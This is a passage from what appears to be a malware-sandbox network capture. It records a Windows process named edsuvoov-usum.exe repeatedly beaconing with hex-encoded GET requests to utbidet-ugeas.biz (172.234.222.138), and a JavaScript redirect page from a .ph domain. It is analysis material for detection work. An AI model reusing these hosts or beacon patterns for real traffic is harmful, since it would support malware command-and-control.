                                                                                                                                                                                                            Sep 7, 2024 15:35:40.795895100 CEST122OUTGET / HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: ysbgwpqywiujo.ph
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:35:41.302834034 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            date: Sat, 07 Sep 2024 13:35:41 GMT
                                                                                                                                                                                                            server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.5.38
                                                                                                                                                                                                            x-powered-by: PHP/5.5.38
                                                                                                                                                                                                            cache-control: no-cache
                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                            content-length: 1960
                                                                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 73 63 72 69 70 74 3e 0a 09 09 09 76 61 72 20 66 6f 72 77 61 72 64 69 6e 67 55 72 6c 20 3d 20 22 2f 70 61 67 65 2f 62 6f 75 6e 63 79 2e 70 68 70 3f 26 62 70 61 65 3d 47 62 68 47 64 69 63 47 6f 31 78 37 6a 25 32 42 39 6c 57 67 53 63 52 6d 32 6a 63 44 5a 39 5a 75 4a 6f 59 73 45 30 38 42 69 44 51 4d 44 36 43 4f 39 42 70 4c 55 4f 45 5a 49 6e 72 70 25 32 46 25 32 42 59 36 37 49 4c 57 47 75 6d 59 50 64 4b 35 48 42 55 51 7a 77 35 67 48 70 36 6a 71 47 6d 57 31 73 4c 75 78 59 6f 64 35 6f 4e 62 6f 59 37 66 4d 66 68 33 64 4c 74 4a 47 6c 43 78 72 25 32 42 34 45 6a 37 59 41 76 70 39 34 51 6a 33 48 58 55 4e 38 55 63 68 6a 63 41 79 42 50 66 54 4e 33 4c 6b 75 58 6f 70 25 32 42 69 70 5a 6f 6d 47 48 47 58 65 31 42 48 30 71 48 46 6a 66 32 6c 4f 48 53 30 49 44 74 43 52 6d 43 69 51 51 34 48 33 55 79 48 49 71 76 77 5a 6b 79 53 6c 36 45 4b 47 59 63 77 4f 4d 76 34 6e 38 47 38 79 47 79 76 5a 45 66 44 38 45 73 67 77 33 56 36 6d 6f 34 71 4b 6d 4a 57 38 25 32 46 4d 65 6a 51 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head><script>var forwardingUrl = "/page/bouncy.php?&bpae=GbhGdicGo1x7j%2B9lWgScRm2jcDZ9ZuJoYsE08BiDQMD6CO9BpLUOEZInrp%2F%2BY67ILWGumYPdK5HBUQzw5gHp6jqGmW1sLuxYod5oNboY7fMfh3dLtJGlCxr%2B4Ej7YAvp94Qj3HXUN8UchjcAyBPfTN3LkuXop%2BipZomGHGXe1BH0qHFjf2lOHS0IDtCRmCiQQ4H3UyHIqvwZkySl6EKGYcwOMv4n8G8yGyvZEfD8Esgw3V6mo4qKmJW8%2FMejQItTrGLWM9%2F03kXvndUOTFYFKJI4vCuDq%2FwQUA4Tkc0EresXf1oHenb12%2FFMGfjFNggkTKbWjxVjCeqNKTaMkJrtr%2Fcl3EoOUpiEH7cKucXDGbEL2xN1BCjFxcv%2B2nPOxOt4JiJzAoCqlAkAl3Uzk%2BHAOXf90m0%3D&redirectType=js";var destinationUrl = "/page/bouncy.php?&bpae=GbhGdicGo1x7j%2B9lWgScRm2jcDZ9ZuJoYsE08BiDQMD6CO9BpLUOEZInrp%2F%2BY67ILWGumYPdK5HBUQzw5gHp6jqGmW1sLuxYod5oNboY7fMfh3dLtJGlCxr%2B4Ej7YAvp94Qj3HXUN8UchjcAyBPfTN3LkuXop%2BipZomGHGXe1BH0qHFjf2lOHS0IDtCRmCiQQ4H3UyHIqvwZkySl6EKGYcwOMv4n8G8yGyvZEfD8Esgw3V6mo4qKmJW8%2FMejQItTrGLWM9%2F03kXvndUOTFYFKJI4vCuDq%2FwQUA4Tkc0EresXf1oHenb12%2FFMGfjFNggkTKbWjxVjCeqNKTaMkJrtr%2Fcl3EoOUpiEH7cKucXDGbEL2xN1BCjFxcv%2B2nPOxOt4JiJ
                                                                                                                                                                                                            Sep 7, 2024 15:35:41.302956104 CEST973INData Raw: 7a 41 6f 43 71 6c 41 6b 41 6c 33 55 7a 6b 25 32 42 48 41 4f 58 66 39 30 6d 30 25 33 44 26 72 65 64 69 72 65 63 74 54 79 70 65 3d 6d 65 74 61 22 3b 0a 09 09 09 76 61 72 20 61 64 64 44 65 74 65 63 74 69 6f 6e 20 3d 20 74 72 75 65 3b 0a 09 09 09 69
                                                                                                                                                                                                            Data Ascii: zAoCqlAkAl3Uzk%2BHAOXf90m0%3D&redirectType=meta";var addDetection = true;if (addDetection) {var inIframe = window.self !== window.top;forwardingUrl += "&inIframe=" + inIframe;var inPopUp = (window.opener !== undefined &&


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            92192.168.2.361449172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:41.322686911 CEST169OUTGET /d/N?0203E9253204E9253231E94D3203E9ABE197D18D6802E9E59A01EA131C31C71C0033D90B32 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:35:41.842564106 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:41 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0203E9253204E9253231E94D3203E9ABE197D18D6802E9E59A01EA131C31C71C0033D90B32
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            93192.168.2.361450172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:41.850671053 CEST201OUTGET /d/N?0203E9253204E9253231E94D3203E9ABE197D18D6802E9E59A01EA131C31C71C0033D90B32 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:35:42.332756042 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:42 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0203E9253204E9253231E94D3203E9ABE197D18D6802E9E59A01EA131C31C71C0033D90B32
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            94192.168.2.361452172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:42.520529985 CEST169OUTGET /d/N?022257A5E92557A5E910578DE922572B3AB66F0DB323576541205493C710799CDB12678BE9 HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:35:43.004947901 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:42 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?022257A5E92557A5E910578DE922572B3AB66F0DB323576541205493C710799CDB12678BE9
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            95192.168.2.361453172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:43.029045105 CEST201OUTGET /d/N?022257A5E92557A5E910578DE922572B3AB66F0DB323576541205493C710799CDB12678BE9 HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:35:43.516443014 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:43 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?022257A5E92557A5E910578DE922572B3AB66F0DB323576541205493C710799CDB12678BE9
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            96192.168.2.361455172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:44.304243088 CEST169OUTGET /d/N?02352D949D322D949D072DBC9D352D1A4EA1153CC7342D5435372EA2B30703ADAF051DBA9D HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:35:44.799300909 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:44 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02352D949D322D949D072DBC9D352D1A4EA1153CC7342D5435372EA2B30703ADAF051DBA9D
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            97192.168.2.361456172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:44.825073957 CEST201OUTGET /d/N?02352D949D322D949D072DBC9D352D1A4EA1153CC7342D5435372EA2B30703ADAF051DBA9D HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:35:45.321513891 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:45 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02352D949D322D949D072DBC9D352D1A4EA1153CC7342D5435372EA2B30703ADAF051DBA9D
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            98192.168.2.361458172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:45.470038891 CEST169OUTGET /d/N?0298EF80DD9FEF80DDAAEFA8DD98EF0E0E0CD7288799EF40759AECB6F3AAC1B9EFA8DFAEDD HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:35:45.977639914 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:45 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0298EF80DD9FEF80DDAAEFA8DD98EF0E0E0CD7288799EF40759AECB6F3AAC1B9EFA8DFAEDD
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            99192.168.2.361459172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:45.984162092 CEST201OUTGET /d/N?0298EF80DD9FEF80DDAAEFA8DD98EF0E0E0CD7288799EF40759AECB6F3AAC1B9EFA8DFAEDD HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:35:46.486342907 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:46 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?0298EF80DD9FEF80DDAAEFA8DD98EF0E0E0CD7288799EF40759AECB6F3AAC1B9EFA8DFAEDD
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            100192.168.2.361461172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:47.270142078 CEST169OUTGET /d/N?02B85052AFBF5052AF8A507AAFB850DC7C2C68FAF5B9509207BA5364818A7E6B9D88607CAF HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:35:47.767663002 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:47 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02B85052AFBF5052AF8A507AAFB850DC7C2C68FAF5B9509207BA5364818A7E6B9D88607CAF
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            101192.168.2.361462172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:47.775046110 CEST201OUTGET /d/N?02B85052AFBF5052AF8A507AAFB850DC7C2C68FAF5B9509207BA5364818A7E6B9D88607CAF HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Sep 7, 2024 15:35:48.261411905 CEST546INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:48 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?02B85052AFBF5052AF8A507AAFB850DC7C2C68FAF5B9509207BA5364818A7E6B9D88607CAF
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            102192.168.2.361464172.234.222.138808004C:\Windows\SysWOW64\edsuvoov-usum.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 7, 2024 15:35:48.885226965 CEST169OUTGET /d/N?028EBB235C89BB235CBCBB0B5C8EBBAD8F1A838B068FBBE3F48CB81572BC951A6EBE8B0D5C HTTP/1.0
                                                                                                                                                                                                            Host: utbidet-ugeas.biz
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
                                                                                                                                                                                                            Sep 7, 2024 15:35:49.385032892 CEST541INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sat, 07 Sep 2024 13:35:49 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 142
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            Location: http://ww99.utbidet-ugeas.biz/d/N?028EBB235C89BB235CBCBB0B5C8EBBAD8F1A838B068FBBE3F48CB81572BC951A6EBE8B0D5C
                                                                                                                                                                                                            Cache-Control: no-store, max-age=0
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
